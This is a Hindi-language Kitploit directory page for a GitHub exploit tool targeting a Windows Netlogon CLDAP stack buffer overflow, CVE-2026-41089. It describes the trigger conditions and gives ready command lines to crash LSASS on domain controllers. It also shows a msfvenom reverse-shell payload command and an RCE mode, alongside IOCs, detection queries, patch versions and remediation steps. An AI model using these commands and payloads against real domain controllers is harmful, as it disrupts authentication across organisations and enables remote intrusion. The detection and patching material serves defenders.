Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41089 — CVE-2026-41089 विंडोज़ Netlogon सेवा में एक गंभीर रिमोट कोड निष्पादन भेद्यता है, जिसमें एक ही पैकेट lsass.exe को क्रैश कर सकता है, जिससे डोमेन कंट्रोलर लगभग 30-60 सेकंड में रीस्टार्ट हो जाता है। इस अवधि के दौरान उस DC के सभी डोमेन प्रमाणीकरण विफल हो जाएंगे। | Kitploit
उपकरण/GitHubGitHub/hnytgl/cve-2026-41089
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलबाइनरी शोषण
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 विंडोज़ Netlogon सेवा में एक गंभीर रिमोट कोड निष्पादन भेद्यता है, जिसमें एक ही पैकेट lsass.exe को क्रैश कर सकता है, जिससे डोमेन कंट्रोलर लगभग 30-60 सेकंड में रीस्टार्ट हो जाता है। इस अवधि के दौरान उस DC के सभी डोमेन प्रमाणीकरण विफल हो जाएंगे।

रिपॉजिटरी देखें
1412223 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41089 — Windows Netlogon CLDAP स्टैक बफ़र ओवरफ़्लो RCE एक्सप्लॉइट

CVE-ID: CVE-2026-41089
CVSS: 9.8 (क्रिटिकल)
CWE: CWE-121 (स्टैक-आधारित बफ़र ओवरफ़्लो)
आक्रमण वेक्टर: UDP/389 (CLDAP SearchRequest)
प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE) / डिनायल ऑफ़ सर्विस (DoS)
प्रभावित संस्करण: Windows Server 2012 R2 ~ 2025 (डोमेन कंट्रोलर)
पैच: मई 2026 संचयी अपडेट

भेद्यता अवलोकन

netlogon.dll में NetpLogonPutUnicodeString फ़ंक्शन में CLDAP सर्च अनुरोधों को संसाधित करते समय स्टैक बफ़र ओवरफ़्लो भेद्यता मौजूद है। यह फ़ंक्शन बाइट लंबाई बजट प्राप्त करता है, लेकिन इसे WCHAR गणना के रूप में व्याख्यायित करता है, जिससे लिखी जाने वाली मात्रा अपेक्षित 2 गुना हो जाती है।

ओवरफ़्लो NlGetLocalPingResponse फ़ंक्शन के 528 बाइट (264 ushort) निश्चित स्टैक बफ़र में होता है। हमलावर-नियंत्रित User फ़ील्ड और सर्वर का स्वयं का DNS डोमेन नाम मिलकर इस बफ़र को भरते हैं, अंततः GS सुरक्षा कुकी को ओवरराइट करते हैं, जिससे __report_gsfailure और lsass.exe क्रैश हो जाता है।

ट्रिगर शर्तें

  • CLDAP SearchRequest में NtVer=0x02 (पुराने, भेद्य BuildSamLogonResponse पथ के उपयोग को बाध्य करता है)
  • User फ़ील्ड की लंबाई ≥ ~130 वर्ण (बाइनरी सीमा लगभग 260 बाइट UTF-16)
  • सर्वर DNS डोमेन नाम की लंबाई ≥ ~80 वर्ण (डोमेन नाम जितना लंबा, कुकी तक पहुँचना उतना ही आसान)

ध्यान दें: NtVer=0x16 (कई सार्वजनिक डिटेक्शन स्क्रिप्ट द्वारा उपयोग किया जाने वाला मान) सुरक्षित BuildSamLogonResponseEx पथ को ट्रिगर करता है, भेद्यता को ट्रिगर नहीं करता।

विशेषताएँ

मोडविवरण
--mode dosविशेष रूप से तैयार किए गए CLDAP पैकेट भेजता है, जिससे LSASS क्रैश होता है, DC रीबूट होता है (~60 सेकंड प्रमाणीकरण बाधित)
--mode rceरिमोट कोड एक्ज़ीक्यूशन का प्रयास करता है (शोध-स्तर, shellcode की आवश्यकता)
--mode scanविभिन्न NtVer मानों की प्रतिक्रियाओं को स्कैन करता है, लक्ष्य DC की फ़िंगरप्रिंटिंग करता है
--mode autoस्वचालित रूप से पता लगाता है और सर्वोत्तम आक्रमण रणनीति चुनता है

DoS मोड

एकल पैकेट lsass.exe को क्रैश कर सकता है, जिससे डोमेन कंट्रोलर लगभग 30-60 सेकंड में रीबूट हो जाता है। इस अवधि के दौरान उस DC के सभी डोमेन प्रमाणीकरण विफल हो जाएंगे।

# बुनियादी उपयोग — 3 पैकेट भेजें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# एकल पैकेट त्वरित आक्रमण
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# आक्रामक मोड — 5 पैकेट समवर्ती
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

RCE मोड

⚠️ शोध-स्तर — वास्तविक वातावरण में अविश्वसनीय और अस्थिर।

RCE को निम्नलिखित चुनौतियों का सामना करना पड़ता है:

  1. ओवरफ़्लो डेटा सर्वर का स्वयं का DNS नाम है, हमलावर का shellcode नहीं
  2. GS कुकी को बायपास करना होगा (सूचना लीक प्रिमिटिव या ब्रूट-फ़ोर्स की आवश्यकता)
  3. Server 2022+ पर CET/ACG/CFG पारंपरिक ROP को और कठिन बनाते हैं
# shellcode उत्पन्न करें
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# RCE श्रृंखला भेजें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

स्कैन मोड

# लक्ष्य DC की फ़िंगरप्रिंटिंग करें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

अपेक्षित आउटपुट उदाहरण (पैच किया गया लक्ष्य):

NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

अपेक्षित आउटपुट उदाहरण (अपैच किया गया लक्ष्य):

NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

यदि NtVer=0x02 टाइमआउट हो जाता है जबकि अन्य संस्करण सामान्य रूप से प्रतिक्रिया देते हैं, तो लक्ष्य में भेद्यता होने की संभावना है।

उन्नत पैरामीटर

पैरामीटरविवरणडिफ़ॉल्ट मान
-l, --user-lenउपयोगकर्ता नाम फ़ील्ड की लंबाई (ASCII वर्ण संख्या)180
--ntverNtVer मान (हेक्साडेसिमल, जैसे 0x02)0x02
--countभेजे जाने वाले DoS पैकेट की संख्या3
--delayपैकेट के बीच विलंब (सेकंड)0.5
-t, --timeoutसॉकेट टाइमआउट (सेकंड)5.0
--jsonJSON प्रारूप में परिणाम आउटपुट करें—
--rawभेजने से पहले कच्चे पैकेट का हेक्स प्रिंट करें—
--quietबैनर आउटपुट को दबाएँ—
--shellcode-fileकस्टम shellcode फ़ाइल (कच्चा x64)—
--lhostरिवर्स शेल सुनने का पता—
--lportरिवर्स शेल सुनने का पोर्ट4444

परीक्षण वातावरण सेटअप

# Windows Server (अपैच) पर लंबे डोमेन नाम वाला DC बनाएँ:
# 1. डोमेन कंट्रोलर के रूप में प्रोमोट करें (बहुत लंबे DNS डोमेन नाम वाला डोमेन, जैसे "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. पुष्टि करें कि मई 2026 से पहले के पैच इंस्टॉल हैं
# 3. आक्रमण मशीन से चलाएँ:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. DC क्रैश और रीबूट होते हुए देखें

संकेतक (IOCs)

नेटवर्क

  • UDP/389 पर User > 100 बाइट और NtVer = 0x02 वाला CLDAP SearchRequest
  • गैर-डोमेन कंट्रोलर होस्ट से DC को असामान्य CLDAP ट्रैफ़िक

होस्ट

Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

डिटेक्शन नियम

index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

पैच जानकारी

Windows Server संस्करणपैच किया गया संस्करण नंबरटिप्पणी
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

डिटेक्शन और उपचार गाइड

त्वरित डिटेक्शन (गैर-विनाशकारी)

# सुरक्षित डिटेक्शन स्क्रिप्ट — लक्ष्य को क्रैश नहीं करेगी
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>

# JSON आउटपुट (बैच स्कैनिंग के लिए उपयुक्त)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json

# पैच सत्यापन चरण दिखाएँ
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch

डिटेक्शन सिद्धांत: NtVer=0x02 (भेद्य पथ ट्रिगर करता है) और NtVer=0x16 (सुरक्षित पथ) के साथ छोटे CLDAP अनुरोध भेजता है। यदि 0x02 टाइमआउट हो जाता है लेकिन 0x16 सामान्य रूप से प्रतिक्रिया देता है, तो लक्ष्य में भेद्यता होने की संभावना है।

उपचार चरण

  1. तत्काल पैच इंस्टॉल करें: मई 2026 संचयी अपडेट (KB5058405 या उच्चतर)

    # इंस्टॉल किए गए अपडेट की जाँच करें
    Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
    
    # नवीनतम अपडेट इंस्टॉल करें
    Install-WindowsUpdate -AcceptAll -AutoReboot
    
  2. netlogon.dll संस्करण सत्यापित करें:

    (Get-Item C:\Windows\System32\netlogon.dll).VersionInfo.FileVersion
    # ऊपर दी गई पैच संस्करण संख्या तालिका से मिलाएँ
    
  3. अस्थायी शमन (जब तत्काल पैच संभव न हो):

    • फ़ायरवॉल में UDP/389 इनबाउंड को प्रतिबंधित करें, केवल विश्वसनीय नेटवर्क सेगमेंट को DC तक पहुँचने दें
    • असामान्य CLDAP अनुरोधों का पता लगाने के लिए IDS नियम तैनात करें (User फ़ील्ड > 100 बाइट + NtVer=0x02)
    • RCE प्रभाव को कम करने के लिए Credential Guard और HVCI सक्षम करें
  4. पश्चात जाँच:

    # lsass क्रैश रिकॉर्ड की जाँच करें
    Get-WinEvent -FilterHashtable @{LogName='Application';Id=1000} |
      Where-Object {$_.Message -match 'lsass.exe' -and $_.Message -match '0xc0000409'} |
      Select-Object TimeCreated, Message -First 5
    

Sigma डिटेक्शन नियम

टूल डाउनलोड करें